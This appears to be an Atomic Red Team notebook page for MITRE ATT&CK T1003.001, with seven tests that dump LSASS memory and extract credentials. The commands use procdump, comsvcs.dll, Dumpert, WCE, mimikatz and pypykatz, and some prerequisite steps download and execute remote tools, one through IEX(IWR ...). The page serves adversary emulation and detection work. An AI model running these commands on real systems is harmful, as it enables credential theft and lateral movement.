# T1003.001 - OS Credential Dumping: LSASS Memory
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>


Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)


## Atomic Tests

In [ ]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - Windows Credential Editor
Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only)

Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.

If you see no output it is likely that execution was blocked by Anti-Virus. 

If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the  get-prereq_commands to download and install Windows Credential Editor first.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1003.001\bin\wce.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
$parentpath = Split-Path "PathToAtomicsFolder\T1003.001\bin\wce.exe"; $zippath = "$parentpath\wce.zip"
IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
if(Invoke-WebRequestVerifyHash "https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip" "$zippath" 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933){
  Expand-Archive $zippath $parentpath\wce -Force
  Move-Item $parentpath\wce\wce.exe "PathToAtomicsFolder\T1003.001\bin\wce.exe"
  Remove-Item $zippath, $parentpath\wce -Recurse
}

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1003.001\bin\wce.exe -o %temp%\wce-output.txt
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 1

### Atomic Test #2 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.

Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.

If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the  get-prereq_commands to download and install the ProcDump tool first.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1003.001\bin\procdump.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\procdump.exe) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe PathToAtomicsFolder\T1003.001\bin\procdump.exe -Force

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 2

### Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.

Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 3

### Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. 
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.

If you see a message saying \"The system cannot find the path specified.\", try using the  get-prereq_commands to download the  tool first.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 4

### Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.

**Supported Platforms:** windows
Run it with these steps!
1. Open Task Manager:
  On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
  on the task bar and selecting "Task Manager".

2. Select lsass.exe:
  If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
  and select it for manipulation.

3. Dump lsass.exe memory:
  Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.


### Atomic Test #6 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})

##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\T1003.001\bin\mimikatz.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\mimikatz.exe) -Force | Out-Null
Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe PathToAtomicsFolder\T1003.001\bin\mimikatz.exe -Force

```
##### Description: Lsass dump must exist at specified location (#{input_file})

##### Check Prereq Commands:
```powershell
cmd /c "if not exist %tmp%\lsass.DMP (exit /b 1)"

```
##### Get Prereq Commands:
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
PathToAtomicsFolder\T1003.001\bin\mimikatz.exe "sekurlsa::minidump %tmp%\lsass.DMP" "sekurlsa::logonpasswords full" exit
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 6

### Atomic Test #7 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::

Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

Successful execution of this test will display multiple useranames and passwords/hashes to the screen.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Computer must have python 3 installed

##### Check Prereq Commands:
```powershell
if (python --version) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
echo "Python 3 must be installed manually"

```
##### Description: Computer must have pip installed

##### Check Prereq Commands:
```powershell
if (pip3 -V) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
echo "PIP must be installed manually"

```
##### Description: pypykatz must be installed and part of PATH

##### Check Prereq Commands:
```powershell
if (cmd /c pypykatz -h) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
pip3 install pypykatz

```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
pypykatz live lsa
```

In [ ]:
Invoke-AtomicTest T1003.001 -TestNumbers 7

## Detection
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.

On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.

Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.